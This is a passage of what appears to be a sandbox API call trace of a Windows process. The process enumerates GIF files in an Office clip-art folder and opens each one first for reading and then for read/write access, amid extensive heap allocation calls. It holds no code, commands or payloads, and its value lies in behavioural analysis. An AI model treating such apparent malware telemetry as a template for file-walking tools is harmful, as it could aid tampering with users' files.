lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0100.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.528] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00092_.GIF", cAlternateFileName="")) returned 1 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0100.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.529] AreFileApisANSI () returned 1 [0100.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0100.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.529] AreFileApisANSI () returned 1 [0100.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0100.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 69 [0100.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.529] GetFileType (hFile=0x368) returned 0x1 [0100.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.529] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.530] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.530] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.530] CloseHandle (hObject=0x368) returned 1 [0100.530] AreFileApisANSI () returned 1 [0100.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0100.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 69 [0100.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.530] GetFileType (hFile=0x368) returned 0x1 [0100.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0100.530] CloseHandle (hObject=0x368) returned 1 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.532] AreFileApisANSI () returned 1 [0100.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0100.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 69 [0100.532] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f6)) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0100.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.532] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x319e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00103_.GIF", cAlternateFileName="")) returned 1 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0100.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0100.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.533] AreFileApisANSI () returned 1 [0100.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0100.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.534] AreFileApisANSI () returned 1 [0100.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0100.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 69 [0100.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.534] GetFileType (hFile=0x368) returned 0x1 [0100.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0100.534] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.534] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.534] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.535] CloseHandle (hObject=0x368) returned 1 [0100.535] AreFileApisANSI () returned 1 [0100.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 69 [0100.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.535] GetFileType (hFile=0x368) returned 0x1 [0100.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.535] CloseHandle (hObject=0x368) returned 1 [0100.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 